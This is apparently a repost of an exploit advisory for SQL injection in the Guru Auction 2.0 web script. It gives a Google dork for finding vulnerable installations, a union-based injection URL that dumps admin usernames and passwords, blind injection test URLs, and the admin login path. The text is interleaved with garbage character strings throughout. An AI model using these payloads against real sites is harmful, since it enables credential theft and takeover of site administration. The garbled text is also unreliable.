Guru Auction 2.0 Multiple SQL Injection Vulnerabilities0 h" t" G5 F, Y
) P" [; w6 Q( G) H2 H5 V作者 : v3n0m
# J* e8 r& ^1 n; q* E) D应用 : Guru Auction 2.00 W3 b! F X5 M$ ?' t
Price : $49+ V+ N: G7 _. p) z
Vendor : http://www.guruscript.com/
$ A- p% C2 _8 x& mGoogle Dork : inurl:subcat.php?cate_id=1 ?0 ]7 q4 ^3 f0 A' \2 M) ]. n
- \7 l" Q( L: I2 h3 S0 I. H
SQLi p0c:
) K4 M. C. D# G~~~~~~~~~~
; `6 Q- I4 G* chttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. {, x7 V5 p2 I) J5 E + U8 k- I" M( @# W+ v0 g2 l
# M+ D( T( J1 w盲注 p0c:
7 r0 f2 h; X8 x~~~~~~~~~~
! v3 _) n! i% X6 j2 ghttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
0 J4 g% y& }0 O% i' A8 O9 `1 B. P3 jhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false4 E8 O! G; o7 k9 j
6 u$ F- h) r: i0 A+ H( y) i1 {
管理登录入口:6 `6 y/ Q. Z9 i. g% o0 i+ ?" p3 ^
~~~~~~~~~~3 q$ a1 M+ W* V) G* p8 C- V% [
http://domain.tld/[path]/admin/5 s. Q$ O) I* @5 i. g
|